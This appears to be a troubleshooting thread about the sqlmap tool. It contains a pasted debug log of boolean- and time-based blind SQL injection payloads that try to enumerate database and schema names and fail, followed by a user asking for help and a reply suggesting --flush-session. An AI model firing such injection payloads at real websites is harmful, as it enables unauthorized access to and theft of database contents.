[07:58:08] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>178114),SLEEP(10),9246) AND 'DoYX'='DoYX
. (done)
[07:58:11] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48),SLEEP(10),9246) AND 'DoYX'='DoYX
[07:58:12] [PAYLOAD] 1' AND 9246=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>1),SLEEP(10),9246) AND 'DoYX'='DoYX
[07:58:14] [INFO] retrieved:
[07:58:14] [DEBUG] performed 3 queries in 45.70 seconds
[07:58:14] [ERROR] unable to retrieve the number of databases
[07:58:14] [INFO] falling back to current database
[07:58:14] [INFO] fetching current database
[07:58:14] [PAYLOAD] 1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>64 AND 'Mhkk'='Mhkk
[07:58:15] [PAYLOAD] 1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>32 AND 'Mhkk'='Mhkk
[07:58:16] [PAYLOAD] 1' AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>1 AND 'Mhkk'='Mhkk
[07:58:17] [INFO] retrieved:
[07:58:17] [DEBUG] performed 3 queries in 3.66 seconds
[07:58:17] [PAYLOAD] 1' AND 7132=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>64),SLEEP(10),7132) AND 'DwNt'='DwNt
[07:58:19] [PAYLOAD] 1' AND 7132=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>32),SLEEP(10),7132) AND 'DwNt'='DwNt
[07:58:20] [PAYLOAD] 1' AND 7132=IF((ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>1),SLEEP(10),7132) AND 'DwNt'='DwNt
[07:58:21] [INFO] retrieved:
[07:58:21] [DEBUG] performed 3 queries in 3.66 seconds
[07:58:21] [CRITICAL] unable to retrieve the database names

[*] shutting down at 07:58:21

Solution pls

@gauravdrago rerun with --flush-session as to me it looks like something changed or that something is broken (at the other side)

Any solution for it

Was this page helpful?
0 / 5 - 0 ratings